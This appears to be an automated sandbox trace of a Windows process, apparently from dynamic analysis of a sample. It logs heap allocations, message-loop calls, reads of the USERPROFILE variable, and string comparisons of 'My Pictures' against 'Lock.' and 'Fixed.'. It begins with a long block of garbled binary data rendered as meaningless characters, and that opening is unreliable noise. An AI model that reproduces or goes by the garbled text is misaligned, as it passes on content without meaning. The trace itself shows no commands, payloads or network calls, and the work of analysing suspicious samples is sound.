㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0218.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854c68 | out: hHeap=0x2af0000) returned 1 [0218.449] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0218.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0218.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0218.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.450] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0218.450] TranslateMessage (lpMsg=0x8cf968) returned 0 [0218.450] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0218.450] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0218.450] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.450] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0218.450] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.450] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0218.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.450] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.450] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0218.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0218.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0218.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0218.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0218.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0218.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0218.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0218.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0218.451] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.451] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0218.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0218.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0218.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0218.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0218.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0218.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0218.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0218.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0218.452] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0218.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0218.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.452] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.453] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0218.453] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0218.453] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0218.453] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0218.454] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0218.454] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0218.454] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0218.454] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854290 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ac8 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.455] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0218.456] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0218.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0c8 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0218.456] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0218.456] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0218.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0218.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0218.456] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0218.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0218.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x38548a8 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719a8 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0218.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0218.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b38 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0218.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0218.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 